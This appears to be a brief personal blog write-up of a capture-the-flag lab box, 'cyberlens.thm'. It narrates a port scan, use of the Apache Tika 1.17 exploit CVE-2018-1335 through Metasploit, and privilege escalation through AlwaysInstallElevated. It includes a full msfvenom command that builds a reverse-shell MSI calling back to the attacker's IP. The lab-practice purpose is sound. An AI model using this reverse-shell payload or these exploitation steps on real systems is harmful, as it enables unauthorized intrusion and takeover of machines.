Before all
I haven’t posted any pentesting write up recently.
It means that I trained my penetration skill hardly recently(but preparing school exams and reversing LOL), time to practice ~
Victim’s IP : 10.10.231.218
Victim’s Host : cyberlens.thm
Attacker’s IP : 10.9.195.189
Write up
RECON
port scan
command
1 | rustscan -a 10.10.231.218 --ulimit 5000 -- -sC -sV -Pn |
Found out an interesting service on port 61777 (Apache Tika 1.17 Server)
Exploit
CVE-2018-1335
Exploiting Tika 1.17 server
After a quick searching on exploit-db, I tried this exploit on msfconsole, and gain a user shell.
Privilege Escalation
Exploiting AlwaysInstallElevated
I used PrivescCheck.ps1 script to check PE Vectors on this machine.
The AlwaysInstallElevated setting allows users to install msi file with admin’s privilege and run it with the same privilege, either.
So, just spawn a vicious msi file with msfvenom:
1 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.195.189 LPORT=9003 -a x64 --platform Windows -f msi -o evil.msi |
Grep it with Victim’s machine and run ~
Aha !
After all
My first pentesting on my New Ubuntu VM >w<
